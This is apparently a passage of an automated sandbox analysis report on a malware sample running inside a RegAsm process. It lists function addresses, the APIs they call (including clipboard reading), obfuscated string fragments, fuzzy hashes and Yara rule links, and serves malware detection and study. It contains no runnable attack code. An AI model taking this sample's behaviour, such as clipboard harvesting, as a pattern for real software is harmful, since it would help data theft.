Opcode Fuzzy Hash: 96cb44eb8e78e60550010c4dfd45fbd262d49c272638a59c278a687f9f1d43aa
Instruction Fuzzy Hash: 6C0128742082409FD709EF18D5A0B2EBBE2EF95705F54892DE5D6477A1C6359820CB4A

Function 00431B50 Relevance: 1.5, APIs: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?), ref: 00431BAF

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 603f7e0ac9d1266857c86e07f246a9185f460025026d973efa19a00a4cb4f488
Instruction ID: 0e50d3fe381928564e07525a4f872a2990670cd4a2dba8882383f1d590287c2f
Opcode Fuzzy Hash: 603f7e0ac9d1266857c86e07f246a9185f460025026d973efa19a00a4cb4f488
Instruction Fuzzy Hash: 26F037342082409BD305EB08D890A1AFBE1EF9A704F508C2CE1C4833A1D235E861CB4A

Function 00433AE0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0040E847,?,00000001,?), ref: 00433B0E

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 0042E67B Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0042E690

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 203b70b180ad9e660cbc1f092ec9a73003738fbe5921fb26d3dfc1c3b9ab78da
Instruction ID: 4129e2b7d000882c1cd8af2e5994b6dd96ef5b53f4f8a98c56b1b3f1b9daadc6
Opcode Fuzzy Hash: 203b70b180ad9e660cbc1f092ec9a73003738fbe5921fb26d3dfc1c3b9ab78da
Instruction Fuzzy Hash: CAD04C307D5304BEF2321B15EC17F0435157742F03F201124B3857C0E189F16650955E

Function 00431C47 Relevance: 1.5, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 00431C3D

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 66674d721119f21f9124b38300556f790f6b7a62b535e1cc9ee2bde82ae9360b
Instruction ID: ed0dc53aba9088742e20c9261bb1a0451bd45e1837753ed52ead1390843da9fe
Opcode Fuzzy Hash: 66674d721119f21f9124b38300556f790f6b7a62b535e1cc9ee2bde82ae9360b
Instruction Fuzzy Hash: 34B01274044110ABEE202B048C05B3C3515FB45305FF01C94A819440B2C52B4C27A94D

Non-executed Functions

Function 0041B0F0 Relevance: 37.4, Strings: 29, Instructions: 1185COMMON

Download Yara Rule

Strings

q1L7, xrefs: 0041B7C2
B9b?, xrefs: 0041B7D8
,g.a, xrefs: 0041BEB6
4`[b, xrefs: 0041C0B0
EC, xrefs: 0041B135
N5A;, xrefs: 0041B7CD
%k(e, xrefs: 0041BEAB
S}, xrefs: 0041BD31
X)Z/, xrefs: 0041B7AC
#s!m, xrefs: 0041BE95
}z, xrefs: 0041BBAD
DG, xrefs: 0041BF0E
({6u, xrefs: 0041BE7F
U[, xrefs: 0041B615
IJ, xrefs: 0041B6E6
\], xrefs: 0041B14B
y, xrefs: 0041B925
<=, xrefs: 0041B7E3
a!V', xrefs: 0041B796
A], xrefs: 0041B6F1
'w;q, xrefs: 0041BE8A
S}, xrefs: 0041B86C, 0041BCEE, 0041BA8E, 0041B81E, 0041BAD1, 0041B551, 0041B50E
j-D3, xrefs: 0041B7B7
S}, xrefs: 0041BF5E
#c2], xrefs: 0041BEC1
T%[+, xrefs: 0041B7A1
IG, xrefs: 0041B12A
4`[b, xrefs: 0041C730
MK, xrefs: 0041B11F

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #c2]$#s!m$%k(e$'w;q$({6u$,g.a$4`[b$4`[b$<=$A]$B9b?$DG$IJ$N5A;$S}$S}$S}$T%[+$X)Z/$\]$a!V'$j-D3$q1L7$y$}z$EC$IG$MK$U[
API String ID: 0-589778090
Opcode ID: 94d92c4924349bfd90a8ed7cbf4659672dc8df439f2081262bcbeb0d6f9d5108
Instruction ID: c35ca2dee0658185c9015c9ed00cb1c807d1e4ff02a7a80a9ab21c663aa53f25
Opcode Fuzzy Hash: 94d92c4924349bfd90a8ed7cbf4659672dc8df439f2081262bcbeb0d6f9d5108
Instruction Fuzzy Hash: 83B22FB454C381CBE334CF24D880B9BBBE1FB86344F20892DE5D99B251DB749985CB96

Function 0041B280 Relevance: 32.3, Strings: 25, Instructions: 1021COMMON

Download Yara Rule

Strings

q1L7, xrefs: 0041B7C2
B9b?, xrefs: 0041B7D8
,g.a, xrefs: 0041BEB6
4`[b, xrefs: 0041C0B0
N5A;, xrefs: 0041B7CD
%k(e, xrefs: 0041BEAB
S}, xrefs: 0041BD31
X)Z/, xrefs: 0041B7AC
#s!m, xrefs: 0041BE95
}z, xrefs: 0041BBAD
DG, xrefs: 0041BF0E
({6u, xrefs: 0041BE7F
U[, xrefs: 0041B615
IJ, xrefs: 0041B6E6
y, xrefs: 0041B925
<=, xrefs: 0041B7E3
a!V', xrefs: 0041B796
A], xrefs: 0041B6F1
'w;q, xrefs: 0041BE8A
S}, xrefs: 0041B86C, 0041BCEE, 0041BA8E, 0041B81E, 0041BAD1, 0041B551, 0041B50E
j-D3, xrefs: 0041B7B7
S}, xrefs: 0041BF5E
#c2], xrefs: 0041BEC1
T%[+, xrefs: 0041B7A1
4`[b, xrefs: 0041C730

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #c2]$#s!m$%k(e$'w;q$({6u$,g.a$4`[b$4`[b$<=$A]$B9b?$DG$IJ$N5A;$S}$S}$S}$T%[+$X)Z/$a!V'$j-D3$q1L7$y$}z$U[
API String ID: 0-1942266033
Opcode ID: e9d7d7dd9b980aca5cbe0089c144270dc13d3860817662602acb5ae783712f24
Instruction ID: 07ba7a0bb07a251972cf6de4fcd871efa2ac6c8edbb187dfd955594968fc0fea
Opcode Fuzzy Hash: e9d7d7dd9b980aca5cbe0089c144270dc13d3860817662602acb5ae783712f24
Instruction Fuzzy Hash: 25A21DB454C381CBE374CF24D880B9BBBE1FB86344F20892EE5D99B251DB749585CB86

Function 00423FC0 Relevance: 31.3, APIs: 2, Strings: 14, Instructions: 3327COMMON

Download Yara Rule

Strings

,"@, xrefs: 0042628D
ARYG, xrefs: 00426901
kjB, xrefs: 00426647, 004269C7
.L6g, xrefs: 00423FDE
AMTN, xrefs: 0042407C
J,", xrefs: 004263E7
]]G\, xrefs: 00426908
(kB, xrefs: 0042487D
h~4/, xrefs: 004262AB
VblR, xrefs: 004249F2
TP&S, xrefs: 00426297
:, xrefs: 00424FCF
`{oj, xrefs: 004262A1
<0;3, xrefs: 00424090

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ,"@$(kB$.L6g$:$<0;3$AMTN$ARYG$J,"$TP&S$VblR$]]G\$`{oj$h~4/$kjB
API String ID: 0-1212006987
Opcode ID: 5f15631d1cac4504fd17ca5f9270542b2c9d9c4be4b59d11bf18c1cb4c187726
Instruction ID: 105613bc0a269390a2d501d69158d34a6d24f4a9867d0093196b8eca7c5ac2f6
Opcode Fuzzy Hash: 5f15631d1cac4504fd17ca5f9270542b2c9d9c4be4b59d11bf18c1cb4c187726
Instruction Fuzzy Hash: 8243AA70204B928BD325CF39D4907A7FBE1AF56304F58896ED4EB8B782D739A405CB58

Function 004149A0 Relevance: 18.6, Strings: 14, Instructions: 1119COMMON

Download Yara Rule

Strings

\&+(, xrefs: 00415299
]3%!, xrefs: 00415291
z[ZY, xrefs: 004156E6
Yd&X, xrefs: 00415281
L'22, xrefs: 004152B9
505*, xrefs: 004152C9
3L, xrefs: 004152D1
T)%%, xrefs: 004152A9
H:>+, xrefs: 004152C1
- -8, xrefs: 004152A1
eWA, xrefs: 0041575F
+O?7, xrefs: 004152B1
UWVZ, xrefs: 00415289
<%, xrefs: 00414F6E

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: +O?7$- -8$3L$505*$<%$H:>+$L'22$T)%%$UWVZ$Yd&X$\&+($]3%!$eWA$z[ZY
API String ID: 0-1281373740
Opcode ID: 9a8c22301cd6ca288e7df442d9346b1ba0436b4ef17774872f9d10b05979d012
Instruction ID: 0cf14e733c09983e4f58af603d62bf5e7b8db451c0c0b36747adb4458b4a8ddf
Opcode Fuzzy Hash: 9a8c22301cd6ca288e7df442d9346b1ba0436b4ef17774872f9d10b05979d012
Instruction Fuzzy Hash: FA7286B010C3808FD315DF29D4916ABBBE1EF96314F188A2DE0D58B392D3799945CB9A

Function 0041DA40 Relevance: 11.2, APIs: 1, Strings: 5, Instructions: 692COMMON

Download Yara Rule

Strings

8A, xrefs: 0041E932
4`[b, xrefs: 0041E470
X\, xrefs: 0041E2A6
4`[b, xrefs: 0041E9C0
HI, xrefs: 0041E6F5

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$4`[b$8A$HI$X\
API String ID: 0-3386483485
Opcode ID: ab81b5f76e5c31b5ecd69c3a4d3c7a3a9ec8b89c096aee1fec114e6d71a5f5e6
Instruction ID: ad75259700cf4d97123048375c98e2c7ddb2dc81fbb39e9c79de734c0b23ba54
Opcode Fuzzy Hash: ab81b5f76e5c31b5ecd69c3a4d3c7a3a9ec8b89c096aee1fec114e6d71a5f5e6
Instruction Fuzzy Hash: BF22B9B5608340DFE314DF29D891A2BBBF2EF85304F44192DE6C287392D7799855CB8A

Function 0041DA60 Relevance: 9.3, Strings: 7, Instructions: 515COMMON

Download Yara Rule

Strings

Yins, xrefs: 0041DCFE
CLP3, xrefs: 0041DFB3, 0041DF88, 0041DFB7
IRTP, xrefs: 0041E029
A, xrefs: 0041E0CC
Yins, xrefs: 0041E088
uzCW, xrefs: 0041E021
_BWA, xrefs: 0041E041

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: CLP3$IRTP$Yins$Yins$_BWA$uzCW$A
API String ID: 0-4293791791
Opcode ID: 08b0d5996bbc06e9606f902b1e9065bacadd22392e4a1fda9e0760b31cab768a
Instruction ID: 6f75a5293f6c8dc8c06376af50025527cf78e254a17a33353f832af2cb67b960
Opcode Fuzzy Hash: 08b0d5996bbc06e9606f902b1e9065bacadd22392e4a1fda9e0760b31cab768a
Instruction Fuzzy Hash: 6002C9B150C390CFD314DF28D89166BBBE1AF8A304F04886EE5C59B392D379D945CB5A

Function 0042A0F0 Relevance: 9.1, APIs: 6, Instructions: 120clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0042A112
GetWindowLongW.USER32 ref: 0042A13D
GetClipboardData.USER32 ref: 0042A14D
CloseClipboard.USER32 ref: 0042A25D

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Clipboard$CloseDataLongOpenWindow
String ID:
API String ID: 1647500905-0
Opcode ID: af9980913aaa41910fe4db3d8a1af5581ef90ccb532b3b11c65d1085b221106b
Instruction ID: f3bed7bb2938886c872c89f1db8f713350d46f9f856d8c9e8a6c24be8a18eb13
Opcode Fuzzy Hash: af9980913aaa41910fe4db3d8a1af5581ef90ccb532b3b11c65d1085b221106b
Instruction Fuzzy Hash: 1141F370A08791CFD711AB78D44836FBFF0AB01354F44886ED8D697382D279A968C767

Function 00411F94 Relevance: 5.4, Strings: 4, Instructions: 401COMMON

Download Yara Rule

Strings

BK6, xrefs: 00412282, 00412287, 0041224E, 00412286
AQ, xrefs: 004120F6
eR, xrefs: 004120EE
(), xrefs: 004123D4

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ()$AQ$BK6$eR
API String ID: 0-2805897768
Opcode ID: 64a76fbc59b9d6fa9f58c45b9b2c7e9799b78376d4cd2a8ff6658d7ba9b248b7
Instruction ID: 3e009d86c41a8e5f888119918b3bb96c684a2fa52100fe337d5d680d9c005bcb
Opcode Fuzzy Hash: 64a76fbc59b9d6fa9f58c45b9b2c7e9799b78376d4cd2a8ff6658d7ba9b248b7
Instruction Fuzzy Hash: 1BD132B46083818FC324CF28D990A6BB7F0FF86354F44592DE5D68B391D3B89855CB5A

Function 00434B0F Relevance: 4.5, Strings: 3, Instructions: 753COMMON

Download Yara Rule

Strings

BSC, xrefs: 00435337
bTC, xrefs: 00435450
"TC, xrefs: 00435413

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "TC$BSC$bTC
API String ID: 0-2356633963
Opcode ID: 6eef2b899739d4526dde68c6a8a080e836e76891bc472aeef559d19ca519bc30
Instruction ID: 69ef8e821754257fb9db5d7b856a7f39bc0fefba0dca6425dea3b99a7b6eaae6
Opcode Fuzzy Hash: 6eef2b899739d4526dde68c6a8a080e836e76891bc472aeef559d19ca519bc30
Instruction Fuzzy Hash: A132D135E04222CFCB08CF68D8906AEB7B1FF89314F1A95B9D955A73A1C335AC45CB94

Function 00434CD0 Relevance: 4.5, Strings: 3, Instructions: 735COMMON

Download Yara Rule

Strings

BSC, xrefs: 00435337
bTC, xrefs: 00435450
"TC, xrefs: 00435413

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "TC$BSC$bTC
API String ID: 0-2356633963
Opcode ID: 3d4e41c7689c4458d3ef6585da0d0000dbb027f20e567cfd839442e1caf56424
Instruction ID: 875ff94d9372009538aed9e01c9165dbcda83fc5fe1a36f9430a2bc79794d705
Opcode Fuzzy Hash: 3d4e41c7689c4458d3ef6585da0d0000dbb027f20e567cfd839442e1caf56424
Instruction Fuzzy Hash: 7932CF35E04226CFCB08CF68D8906AEB7B2FF89314F1A55B9D955A73A1C334AC45CB94

Function 00434EE0 Relevance: 4.4, Strings: 3, Instructions: 608COMMON

Download Yara Rule

Strings

BSC, xrefs: 00435337
bTC, xrefs: 00435450
"TC, xrefs: 00435413

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "TC$BSC$bTC
API String ID: 0-2356633963
Opcode ID: 239e2f8a44c70cf25fb4eed84d32f25ed0451d23b055923932105d63293a1d13
Instruction ID: 9b4aacdd220cdbca5e13beec51703e45f11df1894f2df0dfad60f5e7dc0a79a8
Opcode Fuzzy Hash: 239e2f8a44c70cf25fb4eed84d32f25ed0451d23b055923932105d63293a1d13
Instruction Fuzzy Hash: 92029A35A18221CFCB08CF68D8906AEB7F2FB89314F19997DD949A7361C335AC45CB84

Function 004350C0 Relevance: 4.3, Strings: 3, Instructions: 563COMMON

Download Yara Rule

Strings

BSC, xrefs: 00435337
bTC, xrefs: 00435450
"TC, xrefs: 00435413

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "TC$BSC$bTC
API String ID: 0-2356633963
Opcode ID: ad8ba4ddada9e89937a9b33b80eee6f2e633da6bc08d0e823e4135d32fea2923
Instruction ID: e820248a10fcf665ecf827cd7a0b221f52ee38a0cc4d44d5cf97d7cc54f04038
Opcode Fuzzy Hash: ad8ba4ddada9e89937a9b33b80eee6f2e633da6bc08d0e823e4135d32fea2923
Instruction Fuzzy Hash: 3C02D475A086218FCB08CF68C89166EB7F2FF89314F19997ED956A7391C335AC04CB94

Function 00434FE0 Relevance: 4.3, Strings: 3, Instructions: 556COMMON

Download Yara Rule

Strings

BSC, xrefs: 00435337
bTC, xrefs: 00435450
"TC, xrefs: 00435413

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "TC$BSC$bTC
API String ID: 0-2356633963
Opcode ID: 15706da95bd2f14a0141be2304f3fba4659a4bcecaf5064128986fb32acf9c1b
Instruction ID: 08c511294b169b6e61a93d32ab998cd916f284616cf1035bb8426c0af934e553
Opcode Fuzzy Hash: 15706da95bd2f14a0141be2304f3fba4659a4bcecaf5064128986fb32acf9c1b
Instruction Fuzzy Hash: B102BC35A082118FCB08CF68C8906AEB7F2FF89314F19997DD885A73A1C335AC05CB95

Function 0040F076 Relevance: 3.0, Strings: 2, Instructions: 513COMMON

Download Yara Rule

Strings

V, xrefs: 0040FFA0
+=, xrefs: 00410002

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: +=$V
API String ID: 0-153392263
Opcode ID: af00935d301ab4f4f484216089e961026b6bcf01f4342146fa69dfc9df2ba512
Instruction ID: 2b18c3752e8c2f4ee63feebe8fd4eaa300fb79681e4ddce98a8b23994ecc85b7
Opcode Fuzzy Hash: af00935d301ab4f4f484216089e961026b6bcf01f4342146fa69dfc9df2ba512
Instruction Fuzzy Hash: 9802BE715083408FD725DF28C890A1BBBE1EF8A308F14493EE58597392E73AD945CB9A

Function 00410BEB Relevance: 3.0, Strings: 2, Instructions: 455COMMON

Download Yara Rule

Strings

&, xrefs: 00410F24
z, xrefs: 00410D55

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: &$z
API String ID: 0-617047151
Opcode ID: 6040b96a1f5a654688b6c45822350163bac576a9224c36ff33d26eec85dfcc51
Instruction ID: 7c1ca21b7faf2f000b322caec2cd08a22f7534bb650bfd55ea42e3097d8ce2df
Opcode Fuzzy Hash: 6040b96a1f5a654688b6c45822350163bac576a9224c36ff33d26eec85dfcc51
Instruction Fuzzy Hash: 38F1477050C3808BD325DF19D890B9FBBE5EF96308F14082EE5C987292D7799985CB6B

Function 0041EE7E Relevance: 2.9, Strings: 2, Instructions: 442COMMON

Download Yara Rule

Strings

onml, xrefs: 0041F366
4`[b, xrefs: 0041F3B0

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$onml
API String ID: 0-2697692917
Opcode ID: c0b385bb5debd8af29439994a80214152706220bf36f7be4e41de20da25049bf
Instruction ID: b2eb5fcff445d87dee3c412c222e2263a33ab48642889df12737349e2ca48c3e
Opcode Fuzzy Hash: c0b385bb5debd8af29439994a80214152706220bf36f7be4e41de20da25049bf
Instruction Fuzzy Hash: 22E10231A08381CFC7148F28E89072EB7F2AF8A714F188A7DE5E547392D7359855CB4A

Function 004193A0 Relevance: 2.9, Strings: 2, Instructions: 437COMMON

Download Yara Rule

Strings

(/.-, xrefs: 004195F0
4`[b, xrefs: 00419820

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: (/.-$4`[b
API String ID: 0-585808191
Opcode ID: d6cb2db4f893a06acebe1bb3f2213db90c88c9bc1bc07ea4ae53f0a0b418c89f
Instruction ID: 9fc0f2f554363a2a778dba9744a0e405d54d577cb6074d30e709afd75c1df894
Opcode Fuzzy Hash: d6cb2db4f893a06acebe1bb3f2213db90c88c9bc1bc07ea4ae53f0a0b418c89f
Instruction Fuzzy Hash: 54C1E1715082109BD715EF19C8A1A6BB3F1EF96314F08892EE4C597391E339EC41CB6B

Function 0041FEA0 Relevance: 2.8, Strings: 2, Instructions: 276COMMON

Download Yara Rule

Strings

4`[b, xrefs: 004201A0
onml, xrefs: 00420156

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$onml
API String ID: 0-2697692917
Opcode ID: 72047c627e3eb74e0b983af63a4d034344a34a11fb0d4b108296f89676ad0185
Instruction ID: 7dcc75f691ab13411dfd24b2605dd11a1d5283fc33109a1e341c97134b1bae92
Opcode Fuzzy Hash: 72047c627e3eb74e0b983af63a4d034344a34a11fb0d4b108296f89676ad0185
Instruction Fuzzy Hash: 7F81A974A08300CBD724DF14E890B6BB3F1EF86304F44892DE58987392E7799855CB9A

Function 004363F0 Relevance: 2.8, Strings: 2, Instructions: 273COMMON

Download Yara Rule

Strings

, xrefs: 004364FE
, xrefs: 00436452, 00436574, 00436546, 00436426

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-1425349742
Opcode ID: 534442dbb763a926e66b693da97f98ce7ecca0b8056b46b53228cb8e0c2afe3d
Instruction ID: 6655583ca5fef1f58135e77d24631f2d41e558061a9a86ec1e8dd6944cd53ee0
Opcode Fuzzy Hash: 534442dbb763a926e66b693da97f98ce7ecca0b8056b46b53228cb8e0c2afe3d
Instruction Fuzzy Hash: 2E81BF34608302ABC710DF18D980A2BB7E2EF99754F29D92DE5C487361D735EC61CB9A

Function 00421320 Relevance: 2.8, Strings: 2, Instructions: 258COMMON

Download Yara Rule

Strings

", xrefs: 004215DE
", xrefs: 004215FE

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "$"
API String ID: 0-3758156766
Opcode ID: 4525d932518236bb5693353f43468a12d9a228cc76120ea0a9b821a7244aa01e
Instruction ID: 651d75b7e001f264c39b7e5292b3356677e06ba095e4f2280ad6d40eb0d314bd
Opcode Fuzzy Hash: 4525d932518236bb5693353f43468a12d9a228cc76120ea0a9b821a7244aa01e
Instruction Fuzzy Hash: 9B91C572B083218BD714CE29D44031FFBE2AFD5750F698A2EE498973A4D739DC468786

Function 00420110 Relevance: 2.6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

4`[b, xrefs: 004201A0
onml, xrefs: 00420156

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 4`[b$onml
API String ID: 0-2697692917
Opcode ID: 5fd0337816c6b9d8347be188b4f1db227d1c100013c80befc13ea26395526d3e
Instruction ID: 76863e3e92a9efb7f53202ce03b01bfcfed846a96e6d040762aef8eff9f3fbd6
Opcode Fuzzy Hash: 5fd0337816c6b9d8347be188b4f1db227d1c100013c80befc13ea26395526d3e
Instruction Fuzzy Hash: FE01323460C3448BD315EF08E490A2AB7F0EF4A305F64882DE1C987362D33AA861CB4A

Function 004144C9 Relevance: 2.6, Strings: 2, Instructions: 50COMMON

Download Yara Rule

Strings

bEA, xrefs: 0041454E
*, xrefs: 004144F0

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: *$bEA
API String ID: 0-2776968665
Opcode ID: d4cd93dc498b1313109d5607366495c35bab75df43ae303e8e28570318ec24d5
Instruction ID: fd501069fd264d809ae619123aed5b38f35764916a5c7758494844f51cee1508
Opcode Fuzzy Hash: d4cd93dc498b1313109d5607366495c35bab75df43ae303e8e28570318ec24d5
Instruction Fuzzy Hash: 7D0122B050C380ABC340EF59D580A1EBBF5EBAA708F542E1DE1C89B352C374D9548B9A

Function 00419E8F Relevance: 1.9, APIs: 1, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b10f450330e23ccd97d5b0edb6aefb3f87e93e9e02cab937bdece38a158ae01
Instruction ID: 065b55a46bd003d0309ad9292501d3cda01c5d94a068ae396ad66ea2e5d450a9
Opcode Fuzzy Hash: 2b10f450330e23ccd97d5b0edb6aefb3f87e93e9e02cab937bdece38a158ae01
Instruction Fuzzy Hash: 75D1C034609212EFD704CF28D89076AB3E6EF89314F18893DE985D7391D739E961CB4A

Function 00419140 Relevance: 1.7, APIs: 1, Instructions: 242comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00438538,00000000,00000001,00438528), ref: 00419169

Memory Dump Source

Source File: 00000002.00000002.1940822240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 5e422f0a8c460f69b1a87f90d0f39c04e05f1328b037a2973c1776121fe45670
Instruction ID: 8740be46327c451d178ff566c3411891260d9b1695f017a3d13bacb2e9870746
Opcode Fuzzy Hash: 5e422f0a8c460f69b1a87f90d0f39c04e05f1328b037a2973c1776121fe45670
Instruction Fuzzy Hash: CF51D1B1640204ABDB209B64CCA6BA733B4EF85368F144959F9458B3D1F379ED81C72A

Function 00420E70 Relevance: 1.7, Strings: 1, Instructions: 408COMMON

Download Yara Rule

Strings

", xrefs: 00421158

Memory Dump Source

